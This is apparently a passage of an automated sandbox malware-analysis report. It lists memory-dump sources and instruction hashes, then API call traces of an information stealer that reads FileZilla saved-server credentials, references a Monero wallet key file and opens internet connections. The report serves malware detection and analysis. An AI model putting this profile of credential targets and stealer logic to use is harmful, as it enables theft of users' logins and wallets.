                                      • Opcode ID: faa44400bc5801f2062a43bda6b4f97d16e874440ccd5d3da3789f8bb3698f5a
                                      • Instruction ID: 7b06f3f70b2aa4bfa7b98d714b61a235414e4a44b97516722fcdd6519403259d
                                      • Opcode Fuzzy Hash: faa44400bc5801f2062a43bda6b4f97d16e874440ccd5d3da3789f8bb3698f5a
                                      • Instruction Fuzzy Hash: A4A14CB2A10A19CBEB19CF55CCC1A9EBBB0FB59314F14C62AD45AE77A0D334A940CF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction ID: 282a2157fe5fb1a33ee9674d1ced9921bf1103ca78c368e44591512381867046
                                      • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction Fuzzy Hash: 34A16D72E087119BD308CF25C89075BF7E2EFC8710F1ACA3DA8999B254D774E9419B82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f89725055675f9fe0d890c9304dd57e03d8cc8cb63783e711a6723cab36c8961
                                      • Instruction ID: 063be61567c3cc34b3fe076e879410dc2d5673c3f197b54bb573a2bfe42ea6ce
                                      • Opcode Fuzzy Hash: f89725055675f9fe0d890c9304dd57e03d8cc8cb63783e711a6723cab36c8961
                                      • Instruction Fuzzy Hash: 4A5127F3A082045FF3486E29DC8977AB7D6EBD4310F1B823CDB8553780E93A69058696
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c903c2a3e8e848a76500c946892ecdc3bd179526307d79aaaba1823fb77b0cd
                                      • Instruction ID: 28ebad7ebb6702d243aff7153e2daf194dca3caa566e5efd2aae4f63f6fb3934
                                      • Opcode Fuzzy Hash: 2c903c2a3e8e848a76500c946892ecdc3bd179526307d79aaaba1823fb77b0cd
                                      • Instruction Fuzzy Hash: 0F514BF3B183245FE314692DEC8977BB7C9DB94720F16863EEA8893740E9745C0582D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f15fa1d9d189ade67ce8e0481b6a8aee307ad48fa129fe6605bfc33ff10be07
                                      • Instruction ID: ee5de38f55bc8ac7ebcd32d9db758517a78607f21b72627c64ff29135675b9fe
                                      • Opcode Fuzzy Hash: 8f15fa1d9d189ade67ce8e0481b6a8aee307ad48fa129fe6605bfc33ff10be07
                                      • Instruction Fuzzy Hash: 7E5109F3A092049BE3009A2DDC9076AB7D6EBD4721F2AC53DE6C483384EE3899054656
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d767764ff2f33ce6e1e8f765c7a956c4d27308a03143260efbd5616bceee4804
                                      • Instruction ID: 09c06198018add28155c09fd0ba5fcb5268d4be27d8db1f43efddde8ac1f8c9b
                                      • Opcode Fuzzy Hash: d767764ff2f33ce6e1e8f765c7a956c4d27308a03143260efbd5616bceee4804
                                      • Instruction Fuzzy Hash: C6416BF3A042044BE7146E3DDD9973ABB9ADBE0720F1A463D9BC487384E979281A8241
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: 5aa0adb7f762fe3d06e09f449e880f812fa8f53ade7ffffaf2b1a348cf8b9f0b
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction Fuzzy Hash: DB511962E09BD585C7058B7944502EEBFB25FE6210F1E829EC4981B3C3C3759689D3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e253e57ca7356c224ca0d41709c8b39e882e7e6d9169816814ccce38d8b28744
                                      • Instruction ID: 01774b399433d088ab4463d279d9c9e44650e84ad8465a276c20081bcb8c1658
                                      • Opcode Fuzzy Hash: e253e57ca7356c224ca0d41709c8b39e882e7e6d9169816814ccce38d8b28744
                                      • Instruction Fuzzy Hash: 2521B1B390C6149FE701BE69DC806AAFBE5EF88360F16892DE6C493600D6355841CAD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                      • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00A50DBF,00A50DBE,00A50DBB,00A50DBA), ref: 00A404C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A404C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A404E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A404F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A4052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A4053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00A40579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A40587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A405C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A405D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A40662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A4067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A40692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A406AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A406C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00A406D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00A406E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A406F3
                                      • lstrcat.KERNEL32(?,00A51770), ref: 00A40702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A40715
                                      • lstrcat.KERNEL32(?,00A51774), ref: 00A40724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00A40733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A40746
                                      • lstrcat.KERNEL32(?,00A51780), ref: 00A40755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00A40764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A40777
                                      • lstrcat.KERNEL32(?,00A51790), ref: 00A40786
                                      • lstrcat.KERNEL32(?,00A51794), ref: 00A40795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A407EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 6ac101b8db49329aeddb2b060b72beed7102c8b00c0ebc26fa5d84217071aab3
                                      • Instruction ID: 0274671ec3badb0db4d2d76668fb951070eb0789d9537d63f0279c024ed6ee04
                                      • Opcode Fuzzy Hash: 6ac101b8db49329aeddb2b060b72beed7102c8b00c0ebc26fa5d84217071aab3
                                      • Instruction Fuzzy Hash: DBD13076D40208ABDB04EBF4DE56EEE7739FFA4301F408554F506A6191DE34AA09CB71
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A35A48
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A35A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A35BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0131F4F0,00000000,?,0131E2E8,00000000,?,00A51B4C), ref: 00A35EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00A35ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A35EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A35EEA
